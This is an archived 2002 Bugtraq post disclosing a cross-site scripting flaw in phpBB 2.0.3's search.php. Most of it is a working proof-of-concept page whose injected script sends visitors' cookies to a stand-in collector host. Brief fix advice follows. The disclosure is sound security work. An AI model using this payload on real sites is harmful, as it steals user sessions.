[28118] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Cross-site Scripting Vulnerability in phpBB 2.0.3

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Fabricio=20Angelett)
Thu Dec 5 16:12:04 2002

Message-ID: <20021203200900.17752.qmail@web11606.mail.yahoo.com>
Date: Tue, 3 Dec 2002 14:09:00 -0600 (CST)
From: =?iso-8859-1?q?Fabricio=20Angeletti?= <f_a_a@yahoo.com>
To: BugTraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hello :)

here is the code
----------------
<html>
<body>
<form method="post" name="search"
action="http://target/search.php?mode=searchuser">
<input type="hidden" name="search_username" value=""/>

</form>
<SCRIPT>
search.search_username.value='Http://savecookie/x.php?Cookie="><script>location=search.search_username.value+document.cookie;</script\>';
document.search.submit();
</script>
</body>
</html>
------------
work for me using, IE 6 sp 1 (xp)

maybe you can do this in a better way but, this
example work realy fine

the problem is search.php when show search_username u
can put anything with a few restrictions

solution:
1 Don't show the last entry or something like that
2 filter the code :p

Bye

_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28118] in bugtraq

Cross-site Scripting Vulnerability in phpBB 2.0.3

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Fabricio=20Angelett)Thu Dec 5 16:12:04 2002

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Fabricio=20Angelett)
Thu Dec 5 16:12:04 2002